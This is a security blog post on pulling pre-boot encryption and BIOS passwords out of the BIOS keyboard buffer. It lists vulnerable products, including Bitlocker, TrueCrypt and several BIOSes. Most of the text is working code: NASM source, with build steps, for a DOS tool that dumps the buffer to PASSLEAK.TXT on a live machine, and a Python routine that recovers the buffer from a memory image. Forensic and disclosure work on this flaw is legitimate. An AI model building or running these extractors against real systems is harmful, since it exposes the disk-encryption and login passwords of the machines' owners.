Duplicating Volatility Bioskbd Command Function on Live Windows Systems
I didn’t realize there was still much demand for pulling passwords out of BIOS keyboard buffers until I saw that a “bioskbd” command had been added to the new 1.4 version of the Volatility Framework.
Examples of products that leak passwords in this manner:
Microsoft Bitlocker/Vista (SP0)
TrueCrypt 5.0 (possibly older versions also)
SafeBoot Device Encryption v4, Build 4750 and below
SecurStar’s DriveCrypt Plus Pack v3.9 (possibly other versions also)
DiskCryptor 0.2.6 for Windows (possibly other versions also)
Lenovo 7CETB5WW v2.05 (10/13/2006) BIOS (possibly others too)
Intel Corp PE94510M.86A.0050.2007.0710.1559 (07/10/2007) BIOS (possibly others too)
Hewlett-Packard 68DTT Ver. F.0D BIOS (possibly others too)
These passwords can be retrieved from a live system running one of the vulnerable products. Below is the assembly language source for such a tool; the free NASM assembler can build your own copy from it.
; passleak.asm - copies the BIOS keyboard buffer (0040:001E) to PASSLEAK.TXT
; build: nasm -f bin passleak.asm -o passleak.com
org 100h                    ; DOS .COM program: CS=DS=ES=PSP, code starts at 100h

section .text
_start:
    mov ah, 09h
    mov dx, welcome
    int 0x21                ; display the greeting msg ('$'-terminated)

    mov ax, 0x40            ; 0040:001E is the BIOS keyboard buffer (16 two-byte entries)
    mov ds, ax
    mov si, 0x1e
    mov di, buffer
    mov cx, 0x10            ; 16 entries
leakloop:
    mov ax, [ds:si]         ; AL = ASCII code, AH = scan code
    xor ah, ah
    cmp al, 0x20
    jae keepcopying
    mov al, 0x20            ; below space: replace with a blank
keepcopying:
    cmp al, 0x7e
    jbe keepcopying2        ; '~' (0x7e) is still printable, keep it
    mov al, 0x20            ; above '~': replace with a blank
keepcopying2:
    mov [cs:di], al         ; store the printable byte in our own buffer
    inc di
    add si, byte 2          ; next entry (ASCII + scan code)
    loop leakloop           ; if CX not 0, then decrement CX and loop back up

    push cs
    pop ds                  ; DS back to our own segment
    mov ah, 0x3c            ; MS-DOS create (or truncate) file
    mov dx, fname
    xor cx, cx              ; normal file attributes
    int 0x21
    jc exit                 ; CF set: create failed, nothing to write
    mov bx, ax              ; AX holds the file handle if the create call worked
    mov ah, 0x40            ; MS-DOS write to handle
    mov cx, 0x30            ; 32 bytes of Msg + 16 bytes of buffer
    mov dx, Msg
    int 0x21                ; write buffer to file
    mov ah, 0x3e            ; MS-DOS close handle
    int 0x21
exit:
    mov ax, 0x4c00          ; quit with return code 0
    int 0x21

section .data
welcome db 10,13
        db 'Dumping password to file : PASSLEAK.TXT',10,13
        db 'Look in PASSLEAK.TXT to see what was found in your BIOS keyboard buffer.',10,13
        db 'This is a circular buffer, so your password might wrap around to the front.',10,13
        db 'It should have the last 16 printable characters typed at the login screen.',10,13
        db '$'
fname   db 'Passleak.txt',0
Msg     db 'BIOS keyboard buffer contains: ',0     ; 31 chars + NUL = 32 bytes, buffer follows directly
buffer  times 32 db 'X'                             ; first 16 bytes are overwritten by the loop
;EOF
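Added example (Python, not the post's own NASM tool): the same buffer recovered offline from a memory image, the way the Volatility bioskbd command works rather than reading 0040:001E on a live box. It assumes you have the first 0x3E bytes of segment 0x40 from the image and uses the BIOS tail pointer at 0040:001C to put the circular buffer back into typing order; the image in the block is constructed, so it also serves as a quick check that a product really clears the buffer after login.

```python
# Offsets inside the BIOS Data Area (segment 0x40), standard IBM PC/AT layout.
KBD_HEAD = 0x1A        # word: offset of the next entry INT 16h will return
KBD_TAIL = 0x1C        # word: offset of the next free slot (oldest data once wrapped)
KBD_BUF_START = 0x1E   # 16 entries of (ASCII code, scan code)
KBD_BUF_END = 0x3E     # exclusive


def keyboard_buffer_chars(bda: bytes) -> str:
    """Return the 16 ASCII bytes of the ring in typing order, non-printables as '.'.

    `bda` is a copy of at least the first 0x3E bytes of segment 0x40 from an image.
    """
    tail = int.from_bytes(bda[KBD_TAIL:KBD_TAIL + 2], "little")
    ascii_codes = bda[KBD_BUF_START:KBD_BUF_END:2]   # low byte of each entry
    # The tail points at the slot the next keystroke would overwrite: the oldest one.
    if KBD_BUF_START <= tail < KBD_BUF_END and (tail - KBD_BUF_START) % 2 == 0:
        oldest = (tail - KBD_BUF_START) // 2
    else:
        oldest = 0   # pointer relocated or corrupt: fall back to raw slot order
    ordered = ascii_codes[oldest:] + ascii_codes[:oldest]
    return "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in ordered)


def build_sample_bda(typed: str) -> bytes:
    """Constructed 64-byte BDA image: mimic a BIOS storing each keystroke in the ring.

    INT 16h consumers advance the head but never erase entries, which is the leak.
    """
    bda = bytearray(0x40)
    tail = KBD_BUF_START
    for ch in typed:
        bda[tail] = ord(ch)          # ASCII code
        bda[tail + 1] = 0x00         # scan code (not modelled in this sample)
        tail += 2
        if tail >= KBD_BUF_END:      # ring wraps back to the first slot
            tail = KBD_BUF_START
    bda[KBD_HEAD:KBD_HEAD + 2] = tail.to_bytes(2, "little")   # all keys consumed
    bda[KBD_TAIL:KBD_TAIL + 2] = tail.to_bytes(2, "little")
    return bytes(bda)


if __name__ == "__main__":
    # 20 constructed keystrokes: the ring wrapped, so raw slot order is scrambled
    image = build_sample_bda("zzzz" + "abcdExample123!" + "\r")
    raw = image[KBD_BUF_START:KBD_BUF_END:2]
    print("raw slots:", "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in raw))
    print("in order :", keyboard_buffer_chars(image))
```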
References:
http://www.ivizsecurity.com/security-advisory-iviz-sr-08010.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0807.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0806.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0805.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0804.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0803.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0802.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0801.html
email: david @ sharpesecurity.com
website: www.sharpesecurity.com
Twitter: twitter.com/sharpesecurity
Twitter: twitter.com/patchmanagement